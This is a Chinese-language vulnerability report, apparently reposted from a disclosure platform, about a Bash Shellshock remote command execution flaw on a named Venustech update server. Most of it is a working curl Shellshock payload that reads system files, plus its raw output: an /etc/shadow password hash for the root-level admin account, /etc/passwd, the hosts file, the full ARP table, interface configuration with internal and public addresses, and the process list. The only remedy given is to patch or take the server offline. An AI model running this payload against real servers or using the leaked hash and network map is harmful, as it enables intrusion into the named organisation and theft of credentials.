启明星辰某服务器存在远程命令执行漏洞需更新或者下线
程序员文章站
2022-03-27 21:26:44
启明星辰某服务器存在远程命令执行漏洞,服务器有4块网卡,设置了7个C段的内网IP地址
#1 服务器
https://updates.venustech.com.cn/...
启明星辰某服务器存在远程命令执行漏洞,服务器有4块网卡,设置了7个C段的内网IP地址
#1 服务器
https://updates.venustech.com.cn/
#2 漏洞描述
Bash shellshock Vul
? (192.168.7.49) at 00:13:20:bf:a3:eb [ether] on eth3.2 ? (192.168.7.170) at 04:7d:7b:b4:63:f8 [ether] on eth3.2 ? (192.168.5.67) at 90:b1:1c:6c:95:e4 [ether] on eth3.3 ? (192.168.7.147) at d0:67:e5:06:d6:22 [ether] on eth3.2 ? (192.168.99.99) at 00:90:fb:52:60:7d [ether] on eth5 ? (124.207.17.78) at on eth3.7 ? (192.168.9.15) at 96:6c:d2:0b:8c:f3 [ether] on eth3.7 ? (192.168.5.33) at 78:45:c4:05:bc:b4 [ether] on eth3.3 ? (124.207.17.65) at 00:12:43:78:58:00 [ether] on eth2 ? (124.207.17.74) at on eth3.7 ? (192.168.9.109) at 1a:97:a3:0a:c5:8b [ether] on eth3.4 ? (192.168.7.45) at 00:22:19:04:bf:4e [ether] on eth3.2 ? (124.207.17.70) at on eth3.8 ? (192.168.9.10) at 14:fe:b5:d4:25:6f [ether] on eth3.7 ? (192.168.9.8) at a6:d1:84:f1:a6:a8 [ether] on eth3.7 ? (124.207.17.76) at on eth3.7 ? (192.168.5.30) at 18:03:73:37:47:34 [ether] on eth3.3 ? (124.207.17.77) at a6:d1:84:f1:a6:a8 [ether] on eth3.7 ? (192.168.7.222) at 38:22:d6:a1:27:dc [ether] on eth3.2 ? (192.168.5.200) at 78:45:c4:06:0e:7f [ether] on eth3.3 ? (192.168.7.179) at on eth3.2 ? (192.168.99.20) at b8:ac:6f:3e:b9:24 [ether] on eth5 ? (192.168.9.9) at 3e:54:4b:28:95:13 [ether] on eth3.7 ? (192.168.7.196) at 68:f7:28:b9:c9:97 [ether] on eth3.2 ? (192.168.99.230) at b0:51:8e:00:dc:e3 [ether] on eth5 ? (192.168.7.153) at 1c:fa:68:fe:b9:49 [ether] on eth3.2 ? (192.168.5.85) at 78:a1:06:a0:93:f3 [ether] on eth3.3 ? (192.168.9.103) at 00:19:d1:5a:5c:91 [ether] on eth3.4
eth2 Link encap:Ethernet HWaddr 00:e0:4c:50:29:28 inet addr:124.207.17.66 Bcast:124.207.17.67 Mask:255.255.255.252 inet6 addr: fe80::2e0:4cff:fe50:2928/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:509587196 errors:0 dropped:150 overruns:0 frame:0 TX packets:447431051 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:477215383114 (444.4 GiB) TX bytes:102776363246 (95.7 GiB) Interrupt:18 Memory:d0200000-d0220000 eth3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2753536727 errors:0 dropped:6301 overruns:0 frame:0 TX packets:2704033675 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2398944004498 (2.1 TiB) TX bytes:2645235946740 (2.4 TiB) Interrupt:19 Memory:d0300000-d0320000 eth5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:2b inet addr:192.168.99.1 Bcast:192.168.99.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:292b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2775236580 errors:0 dropped:1087224 overruns:0 frame:0 TX packets:168683223 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:215766978251 (200.9 GiB) TX bytes:159408116401 (148.4 GiB) Interrupt:17 Memory:d0500000-d0520000 eth3.2 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.7.1 Bcast:192.168.7.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:139999170 errors:0 dropped:0 overruns:0 frame:0 TX packets:178749034 errors:0 dropped:49 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:24650666919 (22.9 GiB) TX bytes:196673483318 (183.1 GiB) eth3.3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:827207656 errors:0 dropped:0 overruns:0 frame:0 TX packets:1659932700 errors:0 dropped:441 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:71391019200 (66.4 GiB) TX bytes:2305127162311 (2.0 TiB) eth3.4 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.9.97 Bcast:192.168.9.127 Mask:255.255.255.224 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:38196894 errors:0 dropped:0 overruns:0 frame:0 TX packets:32701192 errors:0 dropped:546 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:38057682408 (35.4 GiB) TX bytes:21081238644 (19.6 GiB) eth3.5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.8.1 Bcast:192.168.8.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:12150050 errors:0 dropped:0 overruns:0 frame:0 TX packets:15849901 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2263388346 (2.1 GiB) TX bytes:15154916440 (14.1 GiB) eth3.6 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.10.1 Bcast:192.168.10.255 Mask:255.255.255.0 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:96227890 errors:0 dropped:0 overruns:0 frame:0 TX packets:7267281 errors:0 dropped:39 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:8879882984 (8.2 GiB) TX bytes:7411205232 (6.9 GiB) eth3.7 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:192.168.9.1 Bcast:192.168.9.31 Mask:255.255.255.224 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1639751756 errors:0 dropped:0 overruns:0 frame:0 TX packets:809504545 errors:0 dropped:21 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2215151596571 (2.0 TiB) TX bytes:99786721439 (92.9 GiB) eth3.8 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29 inet addr:124.207.17.69 Bcast:124.207.17.71 Mask:255.255.255.252 inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3311 errors:0 dropped:0 overruns:0 frame:0 TX packets:29016 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:253892 (247.9 KiB) TX bytes:1218888 (1.1 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:86767 errors:0 dropped:0 overruns:0 frame:0 TX packets:86767 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:113560276 (108.2 MiB) TX bytes:113560276 (108.2 MiB)
#3 证明
curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k # Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 localhost USAP 192.168.9.125 update.lyxtech.com
admin:$6$3Z7FbI1E$Tdnx3/Yx8cqq1xZzbobGnBo91MAR9RPjnixIjSy2tx0X943RONZLLAlLScvOXj5sLPy3du2EX9iMKKMzYqe60/:16287:0:99999:7::: sshd:!!:13153:0:99999:7::: ldap:!!:13153:0:99999:7::: mysql:!!:13195:0:99999:7:::
cat /etc/passwd admin:x:0:0:root:/usap/boot:/bin/bash daemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologin www:x:33:33:www:/usr/local/usap/center/web:/bin/nologin sshd:x:74:74::/var/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false mysql:x:500:500::/home/mysql:/sbin/nologin
UID PID PPID C STIME TTY TIME CMD admin 1 0 0 2015 ? 00:03:17 init [2] admin 2 0 0 2015 ? 00:00:00 [kthreadd] admin 3 2 0 2015 ? 00:00:04 [migration/0] admin 4 2 0 2015 ? 00:48:19 [ksoftirqd/0] admin 5 2 0 2015 ? 00:00:00 [watchdog/0] admin 6 2 0 2015 ? 00:00:09 [migration/1] admin 7 2 11 2015 ? 11-08:44:30 [ksoftirqd/1] admin 8 2 0 2015 ? 00:00:00 [watchdog/1] admin 9 2 0 2015 ? 00:15:58 [events/0] admin 10 2 0 2015 ? 00:07:19 [events/1] admin 11 2 0 2015 ? 00:00:00 [cpuset] admin 12 2 0 2015 ? 00:00:00 [khelper] admin 13 2 0 2015 ? 00:00:00 [netns] admin 14 2 0 2015 ? 00:00:00 [async/mgr] admin 15 2 0 2015 ? 00:00:00 [pm] admin 16 2 0 2015 ? 00:00:10 [sync_supers] admin 17 2 0 2015 ? 00:00:16 [bdi-default] admin 18 2 0 2015 ? 00:00:00 [kintegrityd/0] admin 19 2 0 2015 ? 00:00:00 [kintegrityd/1] admin 20 2 0 2015 ? 00:00:07 [kblockd/0] admin 21 2 0 2015 ? 00:00:10 [kblockd/1] admin 22 2 0 2015 ? 00:00:16 [kacpid] admin 23 2 0 2015 ? 00:00:01 [kacpi_notify] admin 24 2 0 2015 ? 00:00:00 [kacpi_hotplug] admin 25 2 0 2015 ? 00:00:00 [kseriod] admin 28 2 0 2015 ? 01:15:21 [kondemand/0] admin 29 2 0 2015 ? 01:17:09 [kondemand/1] admin 30 2 0 2015 ? 00:00:02 [khungtaskd] admin 31 2 0 2015 ? 00:00:27 [kswapd0] admin 32 2 0 2015 ? 00:00:00 [ksmd] admin 33 2 0 2015 ? 00:00:00 [aio/0] admin 34 2 0 2015 ? 00:00:00 [aio/1] admin 35 2 0 2015 ? 00:00:00 [xfs_mru_cache] admin 36 2 0 2015 ? 00:02:06 [xfslogd/0] admin 37 2 0 2015 ? 00:00:00 [xfslogd/1] admin 38 2 0 2015 ? 00:05:10 [xfsdatad/0] admin 39 2 0 2015 ? 00:00:00 [xfsdatad/1] admin 40 2 0 2015 ? 00:00:00 [xfsconvertd/0] admin 41 2 0 2015 ? 00:00:00 [xfsconvertd/1] admin 42 2 0 2015 ? 00:00:00 [crypto/0] admin 43 2 0 2015 ? 00:00:00 [crypto/1] admin 279 2 0 2015 ? 00:00:00 [ksuspend_usbd] admin 280 2 0 2015 ? 00:00:00 [ata/0] admin 281 2 0 2015 ? 00:00:00 [khubd] admin 282 2 0 2015 ? 00:00:00 [ata/1] admin 283 2 0 2015 ? 00:00:00 [ata_aux] admin 284 2 0 2015 ? 00:00:00 [scsi_eh_0] admin 285 2 0 2015 ? 00:00:00 [scsi_eh_1] admin 290 2 0 2015 ? 00:00:00 [scsi_eh_2] admin 291 2 0 2015 ? 00:00:00 [scsi_eh_3] admin 324 2 0 2015 ? 00:03:33 [flush-8:0] admin 469 2 0 2015 ? 00:00:31 [xfsbufd] admin 470 2 0 2015 ? 00:00:44 [xfsaild] admin 471 2 0 2015 ? 00:00:02 [xfssyncd] admin 473 2 0 2015 ? 00:00:47 [xfsbufd] admin 474 2 0 2015 ? 00:00:49 [xfsaild] admin 475 2 0 2015 ? 00:00:04 [xfssyncd] admin 477 2 0 2015 ? 00:00:00 [loop0] admin 581 1 0 2015 ? 00:00:00 udevd --daemon admin 635 581 0 2015 ? 00:00:00 udevd --daemon admin 636 581 0 2015 ? 00:00:00 udevd --daemon admin 670 2 0 2015 ? 00:00:00 [kconservative/0] admin 671 2 0 2015 ? 00:00:00 [kconservative/1] admin 722 2 0 2015 ? 00:00:00 [USAPTASK] admin 723 2 0 2015 ? 00:00:00 [KUSHSNDMSG] admin 729 2 0 2015 ? 00:00:03 [kClearNet] admin 773 1 0 2015 ? 00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/DB --pid-file=/usr/local/mysql/DB/NSG.pid mysql 1269 773 1 2015 ? 1-07:42:01 /usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/DB --plugin-dir=/usr/local/mysql/lib/plugin --user=mysql --log-error=/usr/local/mysql/DB/NSG.err --pid-file=/usr/local/mysql/DB/NSG.pid --socket=/tmp/mysql.sock --port=3306 admin 1453 1 0 2015 ? 00:18:19 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf admin 1464 1 0 2015 ? 00:32:10 /usr/bin/rsyslogd -c4 admin 1541 1 0 2015 ? 00:03:45 /usr/local/usap/center/bin/billingd admin 1565 1 0 2015 ? 01:51:21 /usr/local/usap/center/bin/dbbackupd admin 1567 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ipmacbind_record admin 1585 1 0 2015 ? 01:11:57 /usr/local/usap/center/bin/HDMonitor admin 1594 1 0 2015 ? 00:02:10 /sbin/dhcpd -cf /usr/local/usap/center/config/dhcpd.conf eth3.2 start admin 1597 1 0 2015 ? 01:05:50 /usr/local/usap/center/bin/bwserverd admin 2103 1 0 2015 ? 00:16:44 /sbin/sshd admin 2106 1 0 2015 ? 00:00:15 /usr/bin/cron admin 2107 1 0 2015 tty1 00:00:00 /sbin/getty 38400 tty1 admin 2108 1 0 2015 ttyS0 00:00:00 /sbin/getty -L 9600 ttyS0 vt100 admin 19474 20565 3 Jan04 ? 11:58:15 /usr/local/usap/center/bin/ClearNet -D admin 19478 2 0 Jan04 ? 00:04:09 [KernelDPI] admin 20565 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ClearNet -D admin 21691 1453 0 18:22 ? 00:00:00 /usr/local/usap/center/web/login.cgi admin 21694 21691 0 18:22 ? 00:00:00 sh -c rm -rf /tmp/tmp_arptable admin 21695 21694 0 18:22 ? 00:00:00 /bin/ps -ef
解决方案:
更新或者下线
上一篇: 阻击小程序?10家手机厂商推快应用
下一篇: 首席信息安全官必须知道的五大黑客工具